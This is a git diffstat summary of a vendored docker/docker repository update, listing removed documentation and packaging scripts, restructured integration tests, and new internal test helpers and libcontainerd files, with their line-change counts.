.../docs/extend/images/authz_chunked.png | Bin 33168 -> 0 bytes .../extend/images/authz_connection_hijack.png | Bin 38780 -> 0 bytes .../docker/docs/extend/images/authz_deny.png | Bin 27099 -> 0 bytes .../docker/docker/docs/extend/index.md | 222 - .../docker/docs/extend/legacy_plugins.md | 98 - .../docker/docker/docs/extend/plugin_api.md | 
196 - .../docs/extend/plugins_authorization.md | 260 - .../docker/docs/extend/plugins_graphdriver.md | 376 - .../docker/docs/extend/plugins_network.md | 77 - .../docker/docs/extend/plugins_volume.md | 276 - .../docker/docker/docs/reference/builder.md | 1746 ----- .../docs/reference/commandline/attach.md | 131 - .../docs/reference/commandline/build.md | 451 -- .../docker/docs/reference/commandline/cli.md | 249 - .../docs/reference/commandline/commit.md | 93 - .../reference/commandline/container_prune.md | 47 - .../docker/docs/reference/commandline/cp.md | 112 - .../docs/reference/commandline/create.md | 211 - .../docs/reference/commandline/deploy.md | 101 - .../docker/docs/reference/commandline/diff.md | 48 - .../reference/commandline/docker_images.gif | Bin 35785 -> 0 bytes .../docs/reference/commandline/dockerd.md | 1364 ---- .../docs/reference/commandline/events.md | 217 - .../docker/docs/reference/commandline/exec.md | 65 - .../docs/reference/commandline/export.md | 43 - .../docs/reference/commandline/history.md | 48 - .../docs/reference/commandline/image_prune.md | 71 - .../docs/reference/commandline/images.md | 304 - .../docs/reference/commandline/import.md | 75 - .../docs/reference/commandline/index.md | 178 - .../docker/docs/reference/commandline/info.md | 224 - .../docs/reference/commandline/inspect.md | 102 - .../docker/docs/reference/commandline/kill.md | 34 - .../docker/docs/reference/commandline/load.md | 53 - .../docs/reference/commandline/login.md | 122 - .../docs/reference/commandline/logout.md | 30 - .../docker/docs/reference/commandline/logs.md | 66 - .../docker/docs/reference/commandline/menu.md | 28 - .../reference/commandline/network_connect.md | 100 - .../reference/commandline/network_create.md | 202 - .../commandline/network_disconnect.md | 43 - .../reference/commandline/network_inspect.md | 192 - .../docs/reference/commandline/network_ls.md | 218 - .../reference/commandline/network_prune.md | 45 - .../docs/reference/commandline/network_rm.md 
| 59 - .../docs/reference/commandline/node_demote.md | 42 - .../reference/commandline/node_inspect.md | 137 - .../docs/reference/commandline/node_ls.md | 130 - .../reference/commandline/node_promote.md | 41 - .../docs/reference/commandline/node_ps.md | 107 - .../docs/reference/commandline/node_rm.md | 73 - .../docs/reference/commandline/node_update.md | 71 - .../docs/reference/commandline/pause.md | 40 - .../reference/commandline/plugin_create.md | 60 - .../reference/commandline/plugin_disable.md | 66 - .../reference/commandline/plugin_enable.md | 65 - .../reference/commandline/plugin_inspect.md | 164 - .../reference/commandline/plugin_install.md | 71 - .../docs/reference/commandline/plugin_ls.md | 53 - .../docs/reference/commandline/plugin_push.md | 50 - .../docs/reference/commandline/plugin_rm.md | 56 - .../docs/reference/commandline/plugin_set.md | 99 - .../reference/commandline/plugin_upgrade.md | 84 - .../docker/docs/reference/commandline/port.md | 41 - .../docker/docs/reference/commandline/ps.md | 384 - .../docker/docs/reference/commandline/pull.md | 252 - .../docker/docs/reference/commandline/push.md | 75 - .../docs/reference/commandline/rename.md | 27 - .../docs/reference/commandline/restart.md | 26 - .../docker/docs/reference/commandline/rm.md | 69 - .../docker/docs/reference/commandline/rmi.md | 83 - .../docker/docs/reference/commandline/run.md | 732 -- .../docker/docs/reference/commandline/save.md | 45 - .../docs/reference/commandline/search.md | 134 - .../reference/commandline/secret_create.md | 90 - .../reference/commandline/secret_inspect.md | 85 - .../docs/reference/commandline/secret_ls.md | 43 - .../docs/reference/commandline/secret_rm.md | 48 - .../reference/commandline/service_create.md | 556 -- .../reference/commandline/service_inspect.md | 162 - .../reference/commandline/service_logs.md | 77 - .../docs/reference/commandline/service_ls.md | 114 - .../docs/reference/commandline/service_ps.md | 161 - .../docs/reference/commandline/service_rm.md | 
55 - .../reference/commandline/service_scale.md | 96 - .../reference/commandline/service_update.md | 181 - .../reference/commandline/stack_deploy.md | 98 - .../docs/reference/commandline/stack_ls.md | 47 - .../docs/reference/commandline/stack_ps.md | 51 - .../docs/reference/commandline/stack_rm.md | 38 - .../reference/commandline/stack_services.md | 70 - .../docs/reference/commandline/start.md | 28 - .../docs/reference/commandline/stats.md | 117 - .../docker/docs/reference/commandline/stop.md | 29 - .../docs/reference/commandline/swarm_init.md | 142 - .../docs/reference/commandline/swarm_join.md | 102 - .../reference/commandline/swarm_join_token.md | 105 - .../docs/reference/commandline/swarm_leave.md | 58 - .../reference/commandline/swarm_unlock.md | 41 - .../reference/commandline/swarm_unlock_key.md | 84 - .../reference/commandline/swarm_update.md | 45 - .../docs/reference/commandline/system_df.md | 76 - .../reference/commandline/system_prune.md | 79 - .../docker/docs/reference/commandline/tag.md | 74 - .../docker/docs/reference/commandline/top.md | 25 - .../docs/reference/commandline/unpause.md | 36 - .../docs/reference/commandline/update.md | 120 - .../docs/reference/commandline/version.md | 67 - .../reference/commandline/volume_create.md | 91 - .../reference/commandline/volume_inspect.md | 59 - .../docs/reference/commandline/volume_ls.md | 183 - .../reference/commandline/volume_prune.md | 54 - .../docs/reference/commandline/volume_rm.md | 42 - .../docker/docs/reference/commandline/wait.md | 25 - .../docker/docker/docs/reference/glossary.md | 286 - .../docker/docker/docs/reference/index.md | 21 - .../docker/docker/docs/reference/run.md | 1555 ----- .../static_files/docker-logo-compressed.png | Bin 4972 -> 0 bytes .../docs/static_files/moby-project-logo.png | Bin 0 -> 20458 bytes .../github.com/docker/docker/errdefs/defs.go | 74 + .../github.com/docker/docker/errdefs/doc.go | 8 + .../docker/docker/errdefs/helpers.go | 240 + 
.../docker/docker/errdefs/helpers_test.go | 194 + vendor/github.com/docker/docker/errdefs/is.go | 114 + .../docker/docker/experimental/README.md | 44 - .../docker/experimental/checkpoint-restore.md | 88 - .../experimental/docker-stacks-and-bundles.md | 202 - .../experimental/images/ipvlan-l3.gliffy | 1 - .../docker/experimental/images/ipvlan-l3.png | Bin 18260 -> 0 bytes .../docker/experimental/images/ipvlan-l3.svg | 1 - .../images/ipvlan_l2_simple.gliffy | 1 - .../experimental/images/ipvlan_l2_simple.png | Bin 20145 -> 0 bytes .../experimental/images/ipvlan_l2_simple.svg | 1 - .../images/macvlan-bridge-ipvlan-l2.gliffy | 1 - .../images/macvlan-bridge-ipvlan-l2.png | Bin 14527 -> 0 bytes .../images/macvlan-bridge-ipvlan-l2.svg | 1 - .../images/multi_tenant_8021q_vlans.gliffy | 1 - .../images/multi_tenant_8021q_vlans.png | Bin 17879 -> 0 bytes .../images/multi_tenant_8021q_vlans.svg | 1 - .../images/vlans-deeper-look.gliffy | 1 - .../experimental/images/vlans-deeper-look.png | Bin 38837 -> 0 bytes .../experimental/images/vlans-deeper-look.svg | 1 - .../docker/experimental/vlan-networks.md | 471 -- .../docker/hack/Jenkins/W2L/postbuild.sh | 35 - .../docker/docker/hack/Jenkins/W2L/setup.sh | 309 - .../docker/docker/hack/Jenkins/readme.md | 3 - .../github.com/docker/docker/hack/README.md | 55 + vendor/github.com/docker/docker/hack/ci/arm | 10 + .../docker/docker/hack/ci/experimental | 9 + vendor/github.com/docker/docker/hack/ci/janky | 17 + .../github.com/docker/docker/hack/ci/powerpc | 6 + vendor/github.com/docker/docker/hack/ci/z | 6 + vendor/github.com/docker/docker/hack/dind | 2 +- .../docker/hack/dockerfile/binaries-commits | 11 - .../hack/dockerfile/install-binaries.sh | 123 - .../dockerfile/install/containerd.installer | 36 + .../dockerfile/install/dockercli.installer | 31 + .../dockerfile/install/gometalinter.installer | 12 + .../docker/hack/dockerfile/install/install.sh | 30 + .../hack/dockerfile/install/proxy.installer | 38 + 
.../hack/dockerfile/install/runc.installer | 22 + .../hack/dockerfile/install/tini.installer | 14 + .../hack/dockerfile/install/tomlv.installer | 12 + .../hack/dockerfile/install/vndr.installer | 11 + .../docker/docker/hack/generate-authors.sh | 2 +- .../docker/hack/generate-swagger-api.sh | 23 +- .../github.com/docker/docker/hack/install.sh | 484 -- .../hack/integration-cli-on-swarm/README.md | 69 + .../integration-cli-on-swarm/agent/Dockerfile | 6 + .../agent/master/call.go | 132 + .../agent/master/master.go | 65 + .../agent/master/set.go | 28 + .../agent/master/set_test.go | 63 + .../agent/types/types.go | 18 + .../agent/vendor.conf | 2 + .../agent/worker/executor.go | 118 + .../agent/worker/worker.go | 69 + .../integration-cli-on-swarm/host/compose.go | 122 + .../host/dockercmd.go | 64 + .../host/enumerate.go | 55 + .../host/enumerate_test.go | 84 + .../integration-cli-on-swarm/host/host.go | 198 + .../integration-cli-on-swarm/host/volume.go | 88 + vendor/github.com/docker/docker/hack/make.ps1 | 123 +- vendor/github.com/docker/docker/hack/make.sh | 140 +- .../docker/docker/hack/make/.binary | 45 +- .../docker/docker/hack/make/.binary-setup | 3 +- .../docker/docker/hack/make/.build-deb/compat | 1 - .../docker/hack/make/.build-deb/control | 29 - .../.build-deb/docker-engine.bash-completion | 1 - .../.build-deb/docker-engine.docker.default | 1 - .../make/.build-deb/docker-engine.docker.init | 1 - .../.build-deb/docker-engine.docker.upstart | 1 - .../make/.build-deb/docker-engine.install | 12 - .../make/.build-deb/docker-engine.manpages | 1 - .../make/.build-deb/docker-engine.postinst | 20 - .../hack/make/.build-deb/docker-engine.udev | 1 - .../docker/docker/hack/make/.build-deb/docs | 1 - .../docker/docker/hack/make/.build-deb/rules | 55 - .../.build-rpm/docker-engine-selinux.spec | 96 - .../hack/make/.build-rpm/docker-engine.spec | 254 - .../docker/hack/make/.detect-daemon-osarch | 50 +- .../docker/docker/hack/make/.ensure-emptyfs | 28 +- 
.../docker/docker/hack/make/.go-autogen | 13 +- .../docker/docker/hack/make/.go-autogen.ps1 | 6 +- .../hack/make/.integration-daemon-setup | 6 +- .../hack/make/.integration-daemon-start | 54 +- .../docker/hack/make/.integration-daemon-stop | 13 +- .../hack/make/.integration-test-helpers | 139 +- .../docker/docker/hack/make/README.md | 3 +- .../github.com/docker/docker/hack/make/binary | 7 +- .../docker/docker/hack/make/binary-client | 12 - .../docker/docker/hack/make/binary-daemon | 34 +- .../docker/docker/hack/make/build-deb | 91 - .../hack/make/build-integration-test-binary | 12 +- .../docker/docker/hack/make/build-rpm | 148 - .../docker/docker/hack/make/clean-apt-repo | 43 - .../docker/docker/hack/make/clean-yum-repo | 20 - .../github.com/docker/docker/hack/make/cover | 15 - .../github.com/docker/docker/hack/make/cross | 33 +- .../docker/docker/hack/make/dynbinary | 7 +- .../docker/docker/hack/make/dynbinary-client | 12 - .../docker/docker/hack/make/dynbinary-daemon | 4 +- .../docker/hack/make/generate-index-listing | 74 - .../docker/docker/hack/make/install-binary | 27 +- .../docker/hack/make/install-binary-client | 10 - .../docker/hack/make/install-binary-daemon | 16 - .../docker/docker/hack/make/install-script | 63 - .../docker/docker/hack/make/release-deb | 163 - .../docker/docker/hack/make/release-rpm | 71 - vendor/github.com/docker/docker/hack/make/run | 6 +- .../docker/docker/hack/make/sign-repos | 65 - .../docker/docker/hack/make/test-deb-install | 71 - .../docker/docker/hack/make/test-docker-py | 2 +- .../docker/hack/make/test-install-script | 31 - .../docker/docker/hack/make/test-integration | 21 + .../docker/hack/make/test-integration-cli | 30 +- .../docker/hack/make/test-integration-shell | 4 +- .../docker/docker/hack/make/test-old-apt-repo | 29 - .../docker/docker/hack/make/test-unit | 55 - vendor/github.com/docker/docker/hack/make/tgz | 92 - .../github.com/docker/docker/hack/make/ubuntu | 190 - .../docker/docker/hack/make/update-apt-repo | 70 - 
vendor/github.com/docker/docker/hack/make/win | 20 - .../github.com/docker/docker/hack/release.sh | 325 - .../docker/docker/hack/test/e2e-run.sh | 72 + .../github.com/docker/docker/hack/test/unit | 38 + .../docker/docker/hack/validate/.validate | 2 +- .../docker/docker/hack/validate/all | 2 +- .../hack/validate/changelog-date-descending | 12 + .../hack/validate/changelog-well-formed | 25 + .../docker/hack/validate/compose-bindata | 28 - .../docker/docker/hack/validate/dco | 2 +- .../docker/docker/hack/validate/default | 9 +- .../docker/hack/validate/default-seccomp | 2 +- .../hack/validate/deprecate-integration-cli | 25 + .../docker/docker/hack/validate/gofmt | 33 - .../docker/docker/hack/validate/gometalinter | 13 + .../docker/hack/validate/gometalinter.json | 27 + .../docker/docker/hack/validate/lint | 31 - .../docker/docker/hack/validate/pkg-imports | 2 +- .../docker/docker/hack/validate/swagger | 2 +- .../docker/docker/hack/validate/swagger-gen | 4 +- .../docker/docker/hack/validate/test-imports | 2 +- .../docker/docker/hack/validate/toml | 2 +- .../docker/docker/hack/validate/vendor | 71 +- .../docker/docker/hack/validate/vet | 32 - .../github.com/docker/docker/hack/vendor.sh | 2 +- .../docker/{daemon => image/cache}/cache.go | 263 +- .../{runconfig => image/cache}/compare.go | 10 +- .../cache}/compare_test.go | 52 +- vendor/github.com/docker/docker/image/fs.go | 30 +- .../github.com/docker/docker/image/fs_test.go | 344 +- .../github.com/docker/docker/image/image.go | 112 +- .../docker/docker/image/image_test.go | 98 +- .../github.com/docker/docker/image/rootfs.go | 12 +- .../docker/docker/image/spec/README.md | 46 + .../docker/docker/image/spec/v1.1.md | 22 +- .../docker/docker/image/spec/v1.2.md | 35 +- .../github.com/docker/docker/image/spec/v1.md | 43 +- .../github.com/docker/docker/image/store.go | 100 +- .../docker/docker/image/store_test.go | 331 +- .../docker/docker/image/tarexport/load.go | 101 +- .../docker/docker/image/tarexport/save.go | 176 +- 
.../docker/image/tarexport/tarexport.go | 14 +- .../docker/docker/image/v1/imagev1.go | 18 +- .../docker/docker/image/v1/imagev1_test.go | 2 +- .../docker/integration-cli/benchmark_test.go | 2 +- .../docker/integration-cli/check_test.go | 278 +- .../checker/checker.go | 2 +- .../docker/integration-cli/cli/build/build.go | 82 + .../docker/docker/integration-cli/cli/cli.go | 226 + .../docker/docker/integration-cli/daemon.go | 608 -- .../docker/integration-cli/daemon/daemon.go | 143 + .../integration-cli/daemon/daemon_swarm.go | 197 + .../docker/integration-cli/daemon_swarm.go | 419 -- ...warm_hack.go => daemon_swarm_hack_test.go} | 9 +- .../docker/integration-cli/daemon_unix.go | 35 - .../docker/integration-cli/daemon_windows.go | 53 - .../integration-cli/docker_api_attach_test.go | 98 +- .../integration-cli/docker_api_auth_test.go | 25 - .../integration-cli/docker_api_build_test.go | 372 +- .../docker_api_build_windows_test.go | 39 + .../docker_api_containers_test.go | 1692 +++-- .../docker_api_containers_windows_test.go | 76 + .../integration-cli/docker_api_create_test.go | 152 +- .../integration-cli/docker_api_events_test.go | 73 - .../docker_api_exec_resize_test.go | 42 +- .../integration-cli/docker_api_exec_test.go | 209 +- .../integration-cli/docker_api_images_test.go | 150 +- .../integration-cli/docker_api_info_test.go | 53 - .../docker_api_inspect_test.go | 26 +- .../docker_api_inspect_unix_test.go | 35 - .../docker_api_ipcmode_test.go | 213 + .../integration-cli/docker_api_logs_test.go | 163 +- .../docker_api_network_test.go | 149 +- .../integration-cli/docker_api_resize_test.go | 44 - .../docker_api_service_update_test.go | 39 - .../integration-cli/docker_api_stats_test.go | 52 +- .../docker_api_stats_unix_test.go | 41 - .../docker_api_swarm_node_test.go | 127 + .../docker_api_swarm_service_test.go | 612 ++ .../integration-cli/docker_api_swarm_test.go | 1223 ++-- .../docker/integration-cli/docker_api_test.go | 72 +- .../docker_api_update_unix_test.go | 35 - 
.../docker_api_version_test.go | 23 - .../docker_api_volumes_test.go | 89 - .../integration-cli/docker_cli_attach_test.go | 25 +- .../docker_cli_attach_unix_test.go | 24 +- .../docker_cli_authz_plugin_v2_test.go | 133 - .../docker_cli_authz_unix_test.go | 477 -- .../integration-cli/docker_cli_build_test.go | 6169 +++++++---------- .../docker_cli_build_unix_test.go | 81 +- .../docker_cli_by_digest_test.go | 76 +- .../integration-cli/docker_cli_commit_test.go | 37 +- .../docker_cli_config_create_test.go | 131 + .../integration-cli/docker_cli_config_test.go | 140 - .../docker_cli_cp_from_container_test.go | 133 +- .../integration-cli/docker_cli_cp_test.go | 20 +- .../docker_cli_cp_to_container_test.go | 150 +- .../docker_cli_cp_to_container_unix_test.go | 46 +- ...p_utils.go => docker_cli_cp_utils_test.go} | 90 +- .../integration-cli/docker_cli_create_test.go | 211 +- .../docker_cli_daemon_plugins_test.go | 209 +- .../integration-cli/docker_cli_daemon_test.go | 1707 ++--- .../integration-cli/docker_cli_diff_test.go | 98 - .../integration-cli/docker_cli_events_test.go | 125 +- .../docker_cli_events_unix_test.go | 65 +- .../integration-cli/docker_cli_exec_test.go | 136 +- .../docker_cli_exec_unix_test.go | 12 +- .../docker_cli_experimental_test.go | 36 - .../docker_cli_export_import_test.go | 39 +- ...er_cli_external_volume_driver_unix_test.go | 122 +- .../integration-cli/docker_cli_health_test.go | 86 +- .../integration-cli/docker_cli_help_test.go | 321 - .../docker_cli_history_test.go | 12 +- .../integration-cli/docker_cli_images_test.go | 102 +- .../integration-cli/docker_cli_import_test.go | 52 +- .../integration-cli/docker_cli_info_test.go | 102 +- .../docker_cli_info_unix_test.go | 2 +- .../docker_cli_inspect_test.go | 68 +- .../integration-cli/docker_cli_kill_test.go | 134 - .../integration-cli/docker_cli_links_test.go | 49 +- .../docker_cli_links_unix_test.go | 26 - .../integration-cli/docker_cli_login_test.go | 22 +- 
.../integration-cli/docker_cli_logout_test.go | 26 +- .../integration-cli/docker_cli_logs_test.go | 144 +- .../integration-cli/docker_cli_nat_test.go | 93 - .../docker_cli_netmode_test.go | 8 +- .../docker_cli_network_unix_test.go | 286 +- .../docker_cli_oom_killed_test.go | 30 - .../integration-cli/docker_cli_pause_test.go | 66 - .../docker_cli_plugins_logdriver_test.go | 48 + .../docker_cli_plugins_test.go | 268 +- .../integration-cli/docker_cli_port_test.go | 40 +- .../integration-cli/docker_cli_proxy_test.go | 36 +- .../docker_cli_prune_unix_test.go | 250 +- .../integration-cli/docker_cli_ps_test.go | 504 +- .../docker_cli_pull_local_test.go | 82 +- .../integration-cli/docker_cli_pull_test.go | 46 +- .../docker_cli_pull_trusted_test.go | 365 - .../integration-cli/docker_cli_push_test.go | 367 +- .../docker_cli_registry_user_agent_test.go | 75 +- .../integration-cli/docker_cli_rename_test.go | 138 - .../docker_cli_restart_test.go | 61 +- .../integration-cli/docker_cli_rm_test.go | 86 - .../integration-cli/docker_cli_rmi_test.go | 116 +- .../integration-cli/docker_cli_run_test.go | 1278 ++-- .../docker_cli_run_unix_test.go | 399 +- .../docker_cli_save_load_test.go | 86 +- .../docker_cli_save_load_unix_test.go | 30 +- .../integration-cli/docker_cli_search_test.go | 6 +- .../docker_cli_secret_create_test.go | 59 +- .../docker_cli_secret_inspect_test.go | 68 - .../docker_cli_service_create_test.go | 324 +- .../docker_cli_service_health_test.go | 101 +- ...cker_cli_service_logs_experimental_test.go | 96 - .../docker_cli_service_logs_test.go | 388 ++ .../docker_cli_service_scale_test.go | 6 +- .../docker_cli_service_update_test.go | 115 +- .../integration-cli/docker_cli_sni_test.go | 2 +- .../integration-cli/docker_cli_stack_test.go | 186 - .../integration-cli/docker_cli_start_test.go | 38 +- .../integration-cli/docker_cli_stats_test.go | 27 +- .../integration-cli/docker_cli_stop_test.go | 17 - .../integration-cli/docker_cli_swarm_test.go | 1422 +++- 
.../docker_cli_swarm_unix_test.go | 60 +- .../integration-cli/docker_cli_tag_test.go | 225 - .../integration-cli/docker_cli_top_test.go | 16 +- .../integration-cli/docker_cli_update_test.go | 41 - .../docker_cli_update_unix_test.go | 64 +- .../integration-cli/docker_cli_userns_test.go | 16 +- .../docker_cli_v2_only_test.go | 103 +- .../docker_cli_version_test.go | 58 - .../integration-cli/docker_cli_volume_test.go | 350 +- .../integration-cli/docker_cli_wait_test.go | 5 +- .../docker_deprecated_api_v124_test.go | 83 +- .../docker_deprecated_api_v124_unix_test.go | 5 +- .../docker_experimental_network_test.go | 594 -- .../docker_hub_pull_suite_test.go | 18 +- .../integration-cli/docker_test_vars.go | 165 - .../docker/integration-cli/docker_utils.go | 1607 ----- .../integration-cli/docker_utils_test.go | 466 ++ .../environment/environment.go | 49 + .../{events_utils.go => events_utils_test.go} | 6 +- .../docker/docker/integration-cli/fixtures.go | 69 - .../auth/docker-credential-shell-test | 2 +- .../fixtures/deploy/default.yaml | 9 - .../fixtures/deploy/remove.yaml | 11 - .../fixtures/deploy/secrets.yaml | 20 - .../integration-cli/fixtures/https/ca.pem | 24 +- .../fixtures/https/client-cert.pem | 74 +- .../fixtures/https/client-key.pem | 17 +- .../fixtures/https/server-cert.pem | 77 +- .../fixtures/https/server-key.pem | 17 +- .../fixtures/notary/delgkey1.crt | 21 - .../fixtures/notary/delgkey1.key | 27 - .../fixtures/notary/delgkey2.crt | 21 - .../fixtures/notary/delgkey2.key | 27 - .../fixtures/notary/delgkey3.crt | 21 - .../fixtures/notary/delgkey3.key | 27 - .../fixtures/notary/delgkey4.crt | 21 - .../fixtures/notary/delgkey4.key | 27 - .../integration-cli/fixtures/notary/gen.sh | 18 - .../fixtures/notary/localhost.cert | 19 - .../fixtures/notary/localhost.key | 27 - .../integration-cli/fixtures/secrets/default | 1 - ...aemon.go => fixtures_linux_daemon_test.go} | 36 +- .../docker/docker/integration-cli/registry.go | 177 - 
.../docker/integration-cli/registry_mock.go | 55 - .../requirement/requirement.go | 34 + .../docker/integration-cli/requirements.go | 243 - .../integration-cli/requirements_test.go | 219 + .../integration-cli/requirements_unix.go | 159 - .../integration-cli/requirements_unix_test.go | 117 + ...st_vars_exec.go => test_vars_exec_test.go} | 0 ...ars_noexec.go => test_vars_noexec_test.go} | 0 ...seccomp.go => test_vars_noseccomp_test.go} | 0 ...s_seccomp.go => test_vars_seccomp_test.go} | 0 .../{test_vars.go => test_vars_test.go} | 2 +- ...st_vars_unix.go => test_vars_unix_test.go} | 0 ...s_windows.go => test_vars_windows_test.go} | 0 .../load => testdata}/emptyLayer.tar | Bin .../docker/integration-cli/trust_server.go | 344 - .../docker/docker/integration-cli/utils.go | 79 - .../docker/integration-cli/utils_test.go | 183 + .../integration/build/build_session_test.go | 129 + .../integration/build/build_squash_test.go | 103 + .../docker/integration/build/build_test.go | 460 ++ .../docker/integration/build/main_test.go | 33 + .../docker/integration/config/config_test.go | 356 + .../docker/integration/config/main_test.go | 33 + .../docker/integration/container/copy_test.go | 65 + .../integration/container/create_test.go | 303 + .../container/daemon_linux_test.go | 78 + .../docker/integration/container/diff_test.go | 42 + .../docker/integration/container/exec_test.go | 50 + .../integration/container/export_test.go | 78 + .../integration/container/health_test.go | 47 + .../integration/container/inspect_test.go | 48 + .../docker/integration/container/kill_test.go | 183 + .../integration/container/links_linux_test.go | 57 + .../docker/integration/container/logs_test.go | 35 + .../docker/integration/container/main_test.go | 33 + .../container/mounts_linux_test.go | 208 + .../docker/integration/container/nat_test.go | 120 + .../integration/container/pause_test.go | 98 + .../docker/integration/container/ps_test.go | 49 + .../integration/container/remove_test.go | 112 + 
.../integration/container/rename_test.go | 213 + .../integration/container/resize_test.go | 66 + .../integration/container/restart_test.go | 114 + .../integration/container/stats_test.go | 43 + .../docker/integration/container/stop_test.go | 127 + .../container/update_linux_test.go | 107 + .../integration/container/update_test.go | 64 + .../docker/docker/integration/doc.go | 3 + .../docker/integration/image/commit_test.go | 48 + .../docker/integration/image/import_test.go | 42 + .../docker/integration/image/main_test.go | 33 + .../docker/integration/image/remove_test.go | 59 + .../docker/integration/image/tag_test.go | 140 + .../internal/container/container.go | 54 + .../integration/internal/container/exec.go | 86 + .../integration/internal/container/ops.go | 136 + .../integration/internal/container/states.go | 41 + .../integration/internal/network/network.go | 35 + .../integration/internal/network/ops.go | 87 + .../internal/requirement/requirement.go | 53 + .../integration/internal/swarm/service.go | 200 + .../docker/integration/network/delete_test.go | 73 + .../docker/integration/network/helpers.go | 85 + .../integration/network/inspect_test.go | 180 + .../integration/network/ipvlan/ipvlan_test.go | 432 ++ .../integration/network/ipvlan/main_test.go | 33 + .../network/macvlan/macvlan_test.go | 282 + .../integration/network/macvlan/main_test.go | 33 + .../docker/integration/network/main_test.go | 33 + .../integration/network/service_test.go | 315 + .../plugin/authz/authz_plugin_test.go | 521 ++ .../plugin/authz/authz_plugin_v2_test.go | 175 + .../integration/plugin/authz/main_test.go | 180 + .../plugin/graphdriver/external_test.go} | 307 +- .../plugin/graphdriver/main_test.go | 36 + .../plugin/logging/cmd/close_on_start/main.go | 48 + .../logging/cmd/close_on_start/main_test.go | 1 + .../plugin/logging/cmd/cmd_test.go | 1 + .../plugin/logging/cmd/dummy/main.go | 19 + .../plugin/logging/cmd/dummy/main_test.go | 1 + .../plugin/logging/helpers_test.go | 67 + 
.../plugin/logging/logging_test.go | 79 + .../integration/plugin/logging/main_test.go | 29 + .../plugin/logging/validation_test.go | 35 + .../docker/integration/plugin/pkg_test.go | 1 + .../plugin/volumes/cmd/cmd_test.go | 1 + .../plugin/volumes/cmd/dummy/main.go | 19 + .../plugin/volumes/cmd/dummy/main_test.go | 1 + .../plugin/volumes/helpers_test.go | 73 + .../integration/plugin/volumes/main_test.go | 32 + .../integration/plugin/volumes/mounts_test.go | 58 + .../docker/integration/secret/main_test.go | 33 + .../docker/integration/secret/secret_test.go | 366 + .../docker/integration/service/create_test.go | 374 + .../integration/service/inspect_test.go | 153 + .../docker/integration/service/main_test.go | 33 + .../integration/service/network_test.go | 75 + .../docker/integration/service/plugin_test.go | 121 + .../docker/integration/session/main_test.go | 33 + .../integration/session/session_test.go | 48 + .../system/cgroupdriver_systemd_test.go | 56 + .../docker/integration/system/event_test.go | 122 + .../integration/system/info_linux_test.go | 48 + .../docker/integration/system/info_test.go | 42 + .../docker/integration/system/login_test.go | 28 + .../docker/integration/system/main_test.go | 33 + .../docker/integration/system/version_test.go | 23 + .../docker/integration/testdata/https/ca.pem | 23 + .../testdata/https/client-cert.pem | 73 + .../integration/testdata/https/client-key.pem | 16 + .../testdata/https/server-cert.pem | 76 + .../integration/testdata/https/server-key.pem | 16 + .../docker/integration/volume/main_test.go | 33 + .../docker/integration/volume/volume_test.go | 116 + .../docker/internal/test/daemon/config.go | 82 + .../docker/internal/test/daemon/container.go | 40 + .../docker/internal/test/daemon/daemon.go | 681 ++ .../internal/test/daemon/daemon_unix.go | 39 + .../internal/test/daemon/daemon_windows.go | 25 + .../docker/internal/test/daemon/node.go | 82 + .../docker/docker/internal/test/daemon/ops.go | 44 + 
.../docker/internal/test/daemon/plugin.go | 77 + .../docker/internal/test/daemon/secret.go | 84 + .../docker/internal/test/daemon/service.go | 131 + .../docker/internal/test/daemon/swarm.go | 194 + .../docker/internal/test/environment/clean.go | 217 + .../internal/test/environment/environment.go | 158 + .../internal/test/environment/protect.go | 254 + .../internal/test/fakecontext/context.go | 131 + .../docker/internal/test/fakegit/fakegit.go | 136 + .../internal/test/fakestorage/fixtures.go | 92 + .../internal/test/fakestorage/storage.go | 200 + .../test}/fixtures/load/frozen.go | 86 +- .../test/fixtures/plugin/basic/basic.go | 34 + .../internal/test/fixtures/plugin/plugin.go | 216 + .../docker/docker/internal/test/helper.go | 6 + .../docker/internal/test/registry/ops.go | 26 + .../docker/internal/test/registry/registry.go | 255 + .../internal/test/registry/registry_mock.go | 71 + .../test/request}/npipe.go | 2 +- .../test/request}/npipe_windows.go | 2 +- .../docker/internal/test/request/ops.go | 78 + .../docker/internal/test/request/request.go | 218 + .../docker/internal/testutil/helpers.go | 17 + .../docker/internal/testutil/stringutils.go | 14 + .../internal/testutil/stringutils_test.go | 34 + .../github.com/docker/docker/layer/empty.go | 7 +- .../docker/docker/layer/empty_test.go | 14 +- .../docker/docker/layer/filestore.go | 25 +- .../docker/docker/layer/filestore_test.go | 8 +- .../docker/docker/layer/filestore_unix.go | 15 + .../docker/docker/layer/filestore_windows.go | 35 + .../github.com/docker/docker/layer/layer.go | 70 +- .../docker/docker/layer/layer_store.go | 152 +- .../docker/layer/layer_store_windows.go | 2 +- .../docker/docker/layer/layer_test.go | 71 +- .../docker/docker/layer/layer_unix.go | 4 +- .../docker/docker/layer/layer_unix_test.go | 6 +- .../docker/docker/layer/layer_windows.go | 76 +- .../docker/docker/layer/migration.go | 16 +- .../docker/docker/layer/migration_test.go | 18 +- .../docker/docker/layer/mount_test.go | 51 +- 
.../docker/docker/layer/mounted_layer.go | 5 +- .../docker/docker/layer/ro_layer.go | 38 +- .../docker/docker/layer/ro_layer_windows.go | 2 +- .../docker/docker/libcontainerd/client.go | 46 - .../docker/libcontainerd/client_daemon.go | 894 +++ .../libcontainerd/client_daemon_linux.go | 108 + .../libcontainerd/client_daemon_windows.go | 55 + .../docker/libcontainerd/client_linux.go | 605 -- .../libcontainerd/client_local_windows.go | 1319 ++++ .../docker/libcontainerd/client_solaris.go | 101 - .../docker/libcontainerd/client_unix.go | 142 - .../docker/libcontainerd/client_windows.go | 631 -- .../docker/docker/libcontainerd/container.go | 13 - .../docker/libcontainerd/container_unix.go | 250 - .../docker/libcontainerd/container_windows.go | 311 - .../docker/docker/libcontainerd/errors.go | 13 + .../docker/docker/libcontainerd/oom_linux.go | 31 - .../docker/libcontainerd/oom_solaris.go | 5 - .../docker/libcontainerd/pausemonitor_unix.go | 42 - .../docker/docker/libcontainerd/process.go | 18 - .../docker/libcontainerd/process_unix.go | 107 - .../docker/libcontainerd/process_windows.go | 19 +- .../libcontainerd/{queue_unix.go => queue.go} | 10 +- .../docker/docker/libcontainerd/queue_test.go | 31 + .../docker/docker/libcontainerd/remote.go | 20 - .../docker/libcontainerd/remote_daemon.go | 344 + .../libcontainerd/remote_daemon_linux.go | 61 + .../libcontainerd/remote_daemon_options.go | 141 + .../remote_daemon_options_linux.go | 18 + .../libcontainerd/remote_daemon_windows.go | 50 + .../docker/libcontainerd/remote_local.go | 59 + .../docker/libcontainerd/remote_unix.go | 544 -- .../docker/libcontainerd/remote_windows.go | 36 - .../docker/docker/libcontainerd/types.go 